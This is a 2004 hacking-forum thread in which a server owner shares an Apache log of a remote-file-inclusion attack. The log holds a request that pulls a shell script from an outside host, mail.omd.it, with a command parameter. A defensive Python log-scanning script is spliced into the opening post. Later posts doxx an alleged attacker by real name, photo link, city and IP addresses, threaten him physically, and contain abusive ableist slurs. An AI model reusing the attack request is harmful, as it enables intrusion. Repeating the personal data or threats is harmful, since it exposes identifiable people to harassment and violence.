Geeklog exploit


22 replies to this topic

#1 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 08 July 2004 - 05:13 AM

I have detected some attack attempts this morning on my server and I started to investigate.

I got this log

200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"

so I immediately recognized that it was a cross site attack. I saw that they got 404, then I connected to http://mail.omd.it/cmd1.txt and the exploit was there, and then I connected to http://omd.it. Guess what I got? Yes, my own site.
Then I instantly thought that the site had been “hacked” and they were using it to hack my site. I instantly blocked their server, but then I thought I will unblock it to show the people the attack.

They use the chatterblock to upload the exploit, then they run it. Well, I have a 2.6.4 kernel. I don't think they would be able to exploit that kernel, as the only vulnerability found on the Linux 2.6 kernel is an iptables DoS attack, and I had my chatterblock disabled.

I love this, I get very excited. I have more people attacking my site than visiting it :) but this was the first “real” attack, the others were just script kids using cmd.exe and other IIS attacks on my *nix server. Now I wonder, does this exploit work?
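The request in the log above is the usual remote-file-inclusion pattern: a query parameter (`show=`) whose value is a URL on another host, with a second parameter (`cmd=id`) passed through to whatever the fetched script does. Apache records the whole request line, so a defender can sweep the access log for it. The following Python script is an added example, not code from the thread or from Geeklog: it parses Apache common-log-format lines and flags any query parameter whose value points at a remote host. The first sample line is the one quoted in the post; the remaining lines, the 192.0.2.x addresses and example.net are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A parameter value starting with one of these is being asked to include
# code from another server (remote file inclusion).
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample log. The first line is the one quoted in the post;
# the others are made up for illustration (192.0.2.x and example.net are
# documentation placeholders).
SAMPLE_LOG = [
    '200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225',
    '192.0.2.10 - - [07/Jul/2004:21:40:01 +0100] "GET /index.php?topic=news&page=2 HTTP/1.1" 200 5120',
    # same attack shape, but with the scheme URL-encoded
    '192.0.2.77 - - [07/Jul/2004:21:41:15 +0100] "GET /chatterblock/cb_chatLog.php?show=http%3A%2F%2Fexample.net%2Fx.txt HTTP/1.0" 200 980',
    # a line that is not in common log format (like the second line in the post) is skipped
    '200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"',
]


def parse_line(line):
    """Split one common-log-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def remote_include_params(target):
    """Return (name, value) pairs from the request target whose value is a remote URL.

    parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too.
    """
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if value.lower().startswith(REMOTE_SCHEMES)
    ]


def find_rfi_attempts(lines):
    """Scan log lines and describe every request that carries a remote-URL parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = remote_include_params(rec["target"])
        if not hits:
            continue
        findings.append({
            "client": rec["host"],
            "time": rec["time"],
            "path": urlsplit(rec["target"]).path,
            "status": rec["status"],
            "params": hits,
            # a 404 means the targeted script was not there; a 2xx means the
            # script answered and the request deserves a closer look
            "served": rec["status"] < 400,
        })
    return findings


if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "missed"
        print(f"{f['time']} {f['client']} {f['path']} {f['status']} [{flag}] {f['params']}")
```

Run over a real access log with `find_rfi_attempts(open("/var/log/apache2/access.log"))` (path assumed; adjust to your server). Requests that were served (2xx) matter more than the 404 in the thread, because they show the targeted script exists and accepted the parameter.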

#2 Belgarath

Belgarath

    That's so raven!

  • Banned
  • 395 posts

Posted 08 July 2004 - 06:10 AM

The c code is very standard. All it does is open up a shell and bind it to a port so they can telnet in.

They get root by running another overflow exploit for do_brk vma. If you're patched you have nothing to worry about.

Looks like standard script kiddy fare. It just makes use of bad parsing of input in the php script and the c code used has been around for months. This is the same stuff attempted against the hakt.tk server a while back. I think wr ranted about it on the hhc forum.

#3 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 08 July 2004 - 02:38 PM

Looks like standard script kiddy fare.

He is not a script kiddy. I found out that he'd taken the omd system and I also found out that his handle is Magnific, who belongs to Int3rc3pt0r, a very "famous" group. I found a lot of sites that he had previously broken into.
http://www.agrigeoplaza.com/
http://www.ptb.hpg.ig.com.br/
http://www.delta5.co...eationpark.com/
I have also found out that his name is Rodrigo and the city where he lives.

The source code had a mixture of Portuguese and Italian/Spanish, so I guess he wrote/adapted some part of the code. I will try to find out more.

#4 Belgarath

Belgarath

    That's so raven!

  • Banned
  • 395 posts

Posted 08 July 2004 - 09:32 PM

Then it just goes to show, even smart people do idiotic things.

The people that attacked the server before were Portuguese.

Here is WR's post on hhc:
http://www.hackerhos...wtopic.php?t=68

It may be the attacker stole the code for the exploit from the same people they did.

#5 jedibebop

jedibebop

    Dangerous free thinker

  • Members
  • 1,935 posts

Posted 08 July 2004 - 10:34 PM

2.6.4 is vulnerable to a few things actually

#6 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 09 July 2004 - 04:05 AM

The people that attacked the server before were Portuguese.


They are not Portuguese, they speak Portuguese and they use an IRC server that is Portuguese, but the guys are
Brazilians

http://www.zone-h.co...er=Int3rc3pt0r/

#7 Belgarath

Belgarath

    That's so raven!

  • Banned
  • 395 posts

Posted 09 July 2004 - 07:13 AM

The people that attacked the server before were Portuguese.


They are not Portuguese, they speak Portuguese and they use an IRC server that is Portuguese, but the guys are
Brazilians

http://www.zone-h.co...er=Int3rc3pt0r/

WR looked into it, not me. He knows more than I do about it.

I hate sites like zone-h. It just exists to glorify criminal (Black Hat) activity and should be taken down.

#8 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 09 July 2004 - 07:52 AM

if anyone is interested to see the wanker
http://www.fotolog.n...hoto_id=7934731
he is the guy on the right

his name is Rodrigo Pereira

Edited by profetas, 09 July 2004 - 08:02 AM.


#9 Belgarath

Belgarath

    That's so raven!

  • Banned
  • 395 posts

Posted 09 July 2004 - 08:21 AM

if anyone is interested to see the wanker
http://www.fotolog.n...hoto_id=7934731
he is the guy on the right

his name is Rodrigo Pereira

I wonder if he is the same guy who tried exploiting hakt.tk.

I bet he would shit his pants if he knew this thread existed.

Edited by Belgarath, 09 July 2004 - 08:22 AM.


#10 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 09 July 2004 - 09:25 AM

Man, I tell you, I will find his house number and I will scare him to death. I will find out more. Any help from people who've already been after him would be useful.

Edited by profetas, 09 July 2004 - 05:36 PM.


#11 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 09 July 2004 - 05:35 PM

I found his IP 200.168.54.46

#12 phreakblaze

phreakblaze

    ...and would you belive they let me play with 30TB!!!

  • Members
  • 1,670 posts

Posted 09 July 2004 - 07:22 PM

wow, you're gonna really get him good, mental note-{don't try shit on profetas' server}

#13 wonderland

wonderland

    Gibson Hacker

  • Members
  • 82 posts
  • Location:Murrieta, CA

Posted 10 July 2004 - 12:52 AM

haha, get him good.

#14 chillmaster

chillmaster

    SUP3R 31337

  • Members
  • 165 posts

Posted 10 July 2004 - 01:36 AM

I'm reading up on IP filtering now and was wondering if you wouldn't mind posting the rule that logged that??

That is dope as hell.

#15 planktonitus

planktonitus

    Mack Daddy 31337

  • Members
  • 238 posts

Posted 11 July 2004 - 09:25 AM

Fucking 1337 shit Profetas B) :voteyes:

#16 Belgarath

Belgarath

    That's so raven!

  • Banned
  • 395 posts

Posted 11 July 2004 - 11:00 PM

I'm reading up on IP filtering now and was wondering if you wouldn't mind posting the rule that logged that??

That is dope as hell.

That's from a standard apache access log.

#17 chillmaster

chillmaster

    SUP3R 31337

  • Members
  • 165 posts

Posted 12 July 2004 - 10:03 PM

OK, I see it now. :P

#18 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 16 July 2004 - 12:56 PM

This is how it “ended”.
I went to their IRC channel to find out some more stuff. There I met one of the members of the group Int3rc3pt0r, a guy called hux0x.
I first measured his knowledge with some simple questions like: do you use snort? I am trying to use string in my C program but I don't know how.

Well, he didn't know much, never programmed, didn't know much about security tools, and every time I spoke to him he seemed to be a very depressed person. Later on came the guy I was after, Magnific, who is totally different, very arrogant, he thinks he knows everything (I was trying to enter their group). I could not resist his stupidity and I started telling him off; he then banned me from the channel. 4 or 6 hours later I connected back. They both were in the channel but only hux0x was present. I started to tell him the “truth”: that I wasn't really joining the group, that I was after Magnific. His first reaction was "noone can get me", then I told him that I wasn't after him so he'd better shut up, that I also had his IP and a lot of information (a “lie”) from him, which he believed. While Magnific wasn't there I started to kind of tell him that what he is doing is childish, and so on. The conversation went on for about 5 min, then he started to tell me what I think is the "truth": his age (12) and the following.

Google translated:
< hux0x > man I am sick
< hux0x > I am gonna tell you
< hux0x to you > I have no legs
< hux0x > therefore I am direct in the PC
< hux0x > and it is my only amusement
< hux0x > I am not like the normal people
< prophet > that is not a reason to be rebelled?
< hux0x > do you think it is easy?
< prophet > if you thinks you are sick then you become sick
< prophet > I know that it is difficult
< prophet > let me tell you something
< hux0x > prophet tell me, tell me how to get my legs back?

I am still after Magnific or Rodrigo Pereira.

#19 White_Raven

White_Raven

    That's so raven!

  • Banned
  • 1,597 posts

Posted 16 July 2004 - 01:23 PM

So he is disabled and thinks that is a perfect excuse to fuck with other people? At least that damn rat bastard can SEE THE DAMN SCREEN, he has no excuse to fuck with servers like that and I take personal offence at his insipid excuses making the other handicapped/handy-capable people out there look stupid or mentally regarded on top of everything else due to his fucknut actions; people see his actions and think we are all like that and while some of us do not like ourselves or have other issues because of what we lack in abilities due to our conditions that does not make us bad people or retarded fucknuts.

Tell him about me and let's get his reaction then; He has no fucking excuse to be a script kiddy lamer warez whore as being crippled and not having a part of your body work does not give you that right; it can make things harder for you yes but if you give up you're nothing but a pussy and a quitter who deserves to die; he could do a lot to better himself but chooses not to because he is too busy feeling sorry for himself and that makes everyone he has a connection to, whether it be the disabled or the internet community, look bad.

If I had the same mentality as him I would be dead or in a home, he needs to grow up and stop being a baby; And I am probably the only one here who can get away with saying this due to my being blind, and I know it… So no flames any of you.

#20 profetas

profetas

    mad 1337

  • Members
  • 146 posts

Posted 16 July 2004 - 02:37 PM

I agree with you. I told him that I am against what he is doing. I am not 100% against defacing websites, but you must have a reason, a strong reason. His reason is amusement, and while I was talking to him he defaced over 100 websites (not really: he defaced the web server, then changed all the pages that the server was hosting). The only way to stop these guys is to send a lot of complaints to their ISP. I tried to contact many people who had been defaced but without success.

But Magnific is a dick, there is no way to speak to him, he's totally arrogant and he is already scared of me, and I will personally smash his face as he lives near me.

Their IPs are
200.168.54.46 Magnific
200.140.14.168 HuX0r
They are both DSL, they may not be static, but they had these IPs at 09/Jul/2004:12:02:34 +0100




BinRev is hosted by the great people at Lunarpages!